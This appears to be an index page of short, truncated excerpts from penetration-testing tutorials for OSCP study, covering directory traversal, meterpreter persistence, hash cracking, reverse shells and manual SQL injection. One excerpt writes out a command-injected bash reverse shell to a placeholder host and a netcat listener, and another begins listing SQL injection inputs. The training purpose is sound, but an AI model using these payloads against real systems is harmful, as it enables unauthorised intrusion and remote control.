So you have researched your web app and have found that it is possible that it is vulnerable to directory traversal attacks. Very often the path to the initial point of the directory traversal is given in the exploit guide. If it isn’t however you can potentially use the dotdotpwn script to find a potential […]
Once you get a meterpreter shell it is important to try and hide the process in an attempt to gain persistence. First of all, make a note of the session number and then background the meterpreter session by issuing the background command background Then migrate the meterpreter process to another session. Do this by using the following […]
The following is specific to Kali Linux. After recovering hashes from the target create a text file with the hashes separated by a new line. Save it in the current working directory as something like hash.txt. Make sure you have unzipped the rockyou.txt password list as this is the password file we will be using […]
Once you have a reverse connection using a Netcat listener you can use the following technique to copy files onto the target machine e.g.: cp /usr/share/exploitdb/platforms/linux/local/9545.c /var/www/html This will copy an exploit into Kali’s web root directory Run the following to ensure your Apache webservice is running: service apache2 start service apache2 status Move back […]
Setup a listener on Kali using Netcat nc -nlvp 4444 Use the following to connect back to the listener from the target: ; bash -i>&/dev/tcp/LOCALIP/4444 0>&1 Use the following to find out your user and privileges: whoami id To create a more interactive shell from the netcat shell try: python -c ‘import […]
So you suspect a page might be vulnerable to SQL Injection but before you run it through SQLmap, you can try the following statements to manually test the input: The intention is for this post to grow over time and become a repository of all the sucessful manual injection points I use. ‘ admin’ or […]
So you’ve been doing some research into preparing for the OSCP Penetration Testing with Kali course and certification. You have discovered that in order to stand a good chance of doing well in the exam it pays to become proficient in enumeration. Enumeration is the process by which the pen tester discovers as much as […]
How to write a basic bash script with an example of a ping sweep to return live hosts.
Understanding linux file permissions and how to change them using chmod.
Very basic Linux Terminal commands for the beginner pen tester.